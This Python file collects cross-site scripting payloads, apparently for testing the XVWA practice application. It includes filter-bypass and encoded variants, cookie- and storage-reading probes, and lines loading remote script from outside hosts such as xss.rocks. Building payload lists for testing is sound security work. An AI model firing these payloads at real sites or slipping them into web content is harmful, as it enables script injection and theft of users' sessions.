"""
XSS payloads for testing Cross-Site Scripting vulnerabilities
"""

class XSSPayloads:
    """XSS payload collection"""
    
    @staticmethod
    def get_basic_payloads():
        """Get basic XSS payloads"""
        return [
            '<script>alert("XSS")</script>',
            '"><script>alert("XSS")</script>',
            "'><script>alert('XSS')</script>",
            '<img src=x onerror=alert("XSS")>',
            'javascript:alert("XSS")',
            '<svg onload=alert("XSS")>',
            '<iframe src="javascript:alert(\'XSS\')">',
            '<body onload=alert("XSS")>',
            '<input onfocus=alert("XSS") autofocus>',
            '<select onfocus=alert("XSS") autofocus>',
            # Additional basic payloads for better coverage
            '<script>alert(1)</script>',
            '<img src=1 onerror=alert(1)>',
            '<svg/onload=alert(1)>',
            'javascript:alert(1)',
            '"><img src=x onerror=alert(1)>',
            "'><img src=x onerror=alert(1)>",
            '<script>confirm(1)</script>',
            '<img src="" onerror="alert(1)">',
            '<svg onload="alert(1)">',
            '<iframe src=javascript:alert(1)>'
        ]
    
    @staticmethod
    def get_advanced_payloads():
        """Get advanced XSS payloads"""
        return [
            '<script>alert(String.fromCharCode(88,83,83))</script>',
            '<img src="x" onerror="alert(\'XSS\')">',
            '<svg/onload=alert(/XSS/)>',
            '<iframe srcdoc="<script>alert(\'XSS\')</script>">',
            '<object data="javascript:alert(\'XSS\')">',
            '<embed src="javascript:alert(\'XSS\')">',
            '<form><button formaction="javascript:alert(\'XSS\')">',
            '<input type="image" src="x" onerror="alert(\'XSS\')">',
            '<video><source onerror="alert(\'XSS\')">',
            '<audio src="x" onerror="alert(\'XSS\')">'
        ]
    
    @staticmethod
    def get_all_payloads():
        """Get all XSS payloads"""
        return XSSPayloads.get_basic_payloads() + XSSPayloads.get_advanced_payloads()
class XSSPayloads:
    """XSS payload collection optimized for XVWA"""
    
    @staticmethod
    def get_basic_payloads():
        """Basic XSS payloads that work on XVWA"""
        return [
            "<script>alert('XSS')</script>",
            "<script>alert(1)</script>",
            "<script>prompt('XSS')</script>",
            "<script>confirm('XSS')</script>",
            "<img src=x onerror=alert('XSS')>",
            "<svg onload=alert('XSS')>",
            "<body onload=alert('XSS')>",
            "<iframe src=javascript:alert('XSS')>",
            "<input onfocus=alert('XSS') autofocus>",
            "<select onfocus=alert('XSS') autofocus>",
            "<textarea onfocus=alert('XSS') autofocus>",
            "<keygen onfocus=alert('XSS') autofocus>",
            "<video><source onerror=alert('XSS')>",
            "<audio src=x onerror=alert('XSS')>",
            "<details open ontoggle=alert('XSS')>",
            "<marquee onstart=alert('XSS')>",
            "javascript:alert('XSS')",
            "'><script>alert('XSS')</script>",
            "\"><script>alert('XSS')</script>",
            "</script><script>alert('XSS')</script>",
            "<script>alert(String.fromCharCode(88,83,83))</script>",
            "<script>alert(/XSS/.source)</script>",
            "<script>alert`XSS`</script>",
            "<script>(alert)('XSS')</script>",
            "<script>a=alert,a('XSS')</script>",
            "<script>[].constructor.constructor('alert(\"XSS\")')();</script>",
            "<script>top['al'+'ert']('XSS')</script>",
            "<script>eval('al'+'ert(\"XSS\")')</script>",
            "<script>Function('al'+'ert(\"XSS\")')();</script>",
            "<script>setTimeout('alert(\"XSS\")',0)</script>",
            "<script>setInterval('alert(\"XSS\")',1000)</script>"
        ]

    @staticmethod
    def get_advanced_payloads():
        """Advanced XSS payloads for bypassing filters"""
        return [
            "<ScRiPt>alert('XSS')</ScRiPt>",
            "<SCRIPT>alert('XSS')</SCRIPT>",
            "<script>alert('XSS')</script>",
            "<script\x20type=\"text/javascript\">alert('XSS');</script>",
            "<script\x09type=\"text/javascript\">alert('XSS');</script>",
            "<script\x0dtype=\"text/javascript\">alert('XSS');</script>",
            "<script\x0atype=\"text/javascript\">alert('XSS');</script>",
            "<script\x0ctype=\"text/javascript\">alert('XSS');</script>",
            "<script/xss src=data:text/javascript,alert('XSS')></script>",
            "<script src=data:,alert('XSS')></script>",
            "<script src=//brutelogic.com.br/1.js></script>",
            "<script>alert(document.domain)</script>",
            "<script>alert(document.cookie)</script>",
            "<script>alert(localStorage)</script>",
            "<script>alert(sessionStorage)</script>",
            "<script>alert(window.name)</script>",
            "<script>alert(location)</script>",
            "<script>alert(navigator.userAgent)</script>",
            "<script>document.write('<img src=x onerror=alert(1)>')</script>",
            "<script>document.body.innerHTML='<img src=x onerror=alert(1)>'</script>",
            "<script>eval(atob('YWxlcnQoJ1hTUycp'))</script>",
            "<script>eval(unescape('%61%6c%65%72%74%28%27%58%53%53%27%29'))</script>",
            "<script>eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))</script>",
            "<img src=\"x\" onerror=\"alert('XSS')\">",
            "<img src='x' onerror='alert(\"XSS\")'>",
            "<img src=x onerror=alert('XSS')>",
            "<img/src=x/onerror=alert('XSS')>",
            "<img\x20src=x\x20onerror=alert('XSS')>",
            "<img\x09src=x\x09onerror=alert('XSS')>",
            "<img\x0dsrc=x\x0donerror=alert('XSS')>",
            "<img\x0asrc=x\x0aonerror=alert('XSS')>",
            "<img\x0csrc=x\x0conerror=alert('XSS')>",
            "<svg/onload=alert('XSS')>",
            "<svg onload=alert('XSS')></svg>",
            "<svg><script>alert('XSS')</script></svg>",
            "<svg><script href=data:,alert('XSS') />",
            "<svg><script xlink:href=data:,alert('XSS') />",
            "<math><mi//xlink:href=\"data:x,<script>alert('XSS')</script>\">",
            "<embed src=javascript:alert('XSS')>",
            "<object data=javascript:alert('XSS')>",
            "<iframe src=javascript:alert('XSS')></iframe>",
            "<iframe srcdoc=\"<script>alert('XSS')</script>\"></iframe>",
            "<iframe src=\"data:text/html,<script>alert('XSS')</script>\"></iframe>",
            "<iframe src=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=></iframe>",
            "<form><button formaction=javascript:alert('XSS')>XSS</button></form>",
            "<form><input formaction=javascript:alert('XSS') type=submit value=XSS></form>",
            "<form><textarea formaction=javascript:alert('XSS')></textarea></form>",
            "<isindex formaction=javascript:alert('XSS') type=submit value=XSS>",
            "<input type=image src=x onerror=alert('XSS')>",
            "<input type=image src=x:x onerror=alert('XSS')>",
            "<input onfocus=alert('XSS') autofocus>",
            "<input onblur=alert('XSS') autofocus><input autofocus>",
            "<input onclick=alert('XSS') type=button value=XSS>",
            "<input onchange=alert('XSS') value=XSS>",
            "<input onkeydown=alert('XSS')>",
            "<input onkeypress=alert('XSS')>",
            "<input onkeyup=alert('XSS')>",
            "<input onmousedown=alert('XSS')>",
            "<input onmousemove=alert('XSS')>",
            "<input onmouseout=alert('XSS')>",
            "<input onmouseover=alert('XSS')>",
            "<input onmouseup=alert('XSS')>",
            "<input onselect=alert('XSS')>",
            "<select onfocus=alert('XSS') autofocus>",
            "<select onchange=alert('XSS')><option>XSS</option></select>",
            "<textarea onfocus=alert('XSS') autofocus>",
            "<textarea onchange=alert('XSS')>XSS</textarea>",
            "<textarea onkeydown=alert('XSS')>",
            "<textarea onkeypress=alert('XSS')>",
            "<textarea onkeyup=alert('XSS')>",
            "<keygen onfocus=alert('XSS') autofocus>",
            "<video><source onerror=alert('XSS')>",
            "<video onerror=alert('XSS')><source></video>",
            "<audio src=x onerror=alert('XSS')>",
            "<audio onerror=alert('XSS')><source></audio>",
            "<details open ontoggle=alert('XSS')>",
            "<details ontoggle=alert('XSS') open>",
            "<marquee onstart=alert('XSS')>XSS</marquee>",
            "<marquee onbounce=alert('XSS')>XSS</marquee>",
            "<marquee onfinish=alert('XSS')>XSS</marquee>",
            "<body onload=alert('XSS')>",
            "<body onpageshow=alert('XSS')>",
            "<body onfocus=alert('XSS')>",
            "<body onhashchange=alert('XSS')>",
            "<body onresize=alert('XSS')>",
            "<body onscroll=alert('XSS')>",
            "<body onunload=alert('XSS')>",
            "<body onbeforeunload=alert('XSS')>",
            "<body onerror=alert('XSS')>",
            "<frameset onload=alert('XSS')>",
            "<table background=javascript:alert('XSS')>",
            "<table><td background=javascript:alert('XSS')>",
            "<div style=\"background-image:url(javascript:alert('XSS'))\">",
            "<div style=\"background:url(javascript:alert('XSS'))\">",
            "<div style=\"list-style-image:url(javascript:alert('XSS'))\">",
            "<div style=\"binding:url(javascript:alert('XSS'))\">",
            "<link rel=stylesheet href=javascript:alert('XSS')>",
            "<link rel=stylesheet href=data:,*%7bx:expression(alert('XSS'))%7d>",
            "<style>@import'javascript:alert(\"XSS\")';</style>",
            "<style>@import\"javascript:alert('XSS')\";</style>",
            "<style>li {list-style-image: url(\"javascript:alert('XSS')\");}</style><li>XSS</li>",
            "<style>body {-moz-binding:url(\"javascript:alert('XSS')\")}</style>",
            "<style>body {behavior:url(javascript:alert('XSS'));}</style>",
            "<style>body {background:url(\"javascript:alert('XSS')\")}</style>",
            "<style>body {background-image:url(javascript:alert('XSS'))}</style>",
            "<style>*{x:expression(alert('XSS'))}</style>",
            "<xss style=x:expression(alert('XSS'))>",
            "<xss style=\"x:expression(alert('XSS'))\">",
            "<div style=width:expression(alert('XSS'))>",
            "<div style=\"width:expression(alert('XSS'))\">",
            "<img style=\"xss:expr/*XSS*/ession(alert('XSS'))\">",
            "<div style=\"background:url(data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=)\">",
            "<div style=\"background:url(data:text/html,<script>alert('XSS')</script>)\">",
            "<<SCRIPT>alert('XSS');//<</SCRIPT>",
            "<script>alert('XSS');</script>",
            "<script src=# onmouseover=\"alert('XSS')\">",
            "<script>alert('XSS')</script>",
            "<IMG \"\"\"><SCRIPT>alert('XSS')</SCRIPT>\">",
            "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
            "<IMG SRC=# onmouseover=\"alert('XSS')\">",
            "<IMG SRC= onmouseover=\"alert('XSS')\">",
            "<IMG onmouseover=\"alert('XSS')\">",
            "<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>",
            "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>",
            "<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>",
            "<IMG SRC=\"jav\tascript:alert('XSS');\">",
            "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">",
            "<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">",
            "<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">",
            "<IMG SRC=\" &#14;  javascript:alert('XSS');\">",
            "<SCRIPT/XSS SRC=\"http://xss.rocks/xss.js\"></SCRIPT>",
            "<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>",
            "<SCRIPT/SRC=\"http://xss.rocks/xss.js\"></SCRIPT>",
            "<<SCRIPT>alert(\"XSS\");//<</SCRIPT>",
            "<SCRIPT SRC=http://xss.rocks/xss.js?< B >",
            "<SCRIPT SRC=//xss.rocks/.j>",
            "<IMG SRC=\"javascript:alert('XSS')\"",
            "<iframe src=http://xss.rocks/scriptlet.html <",
            "\\\";alert('XSS');//"
        ]
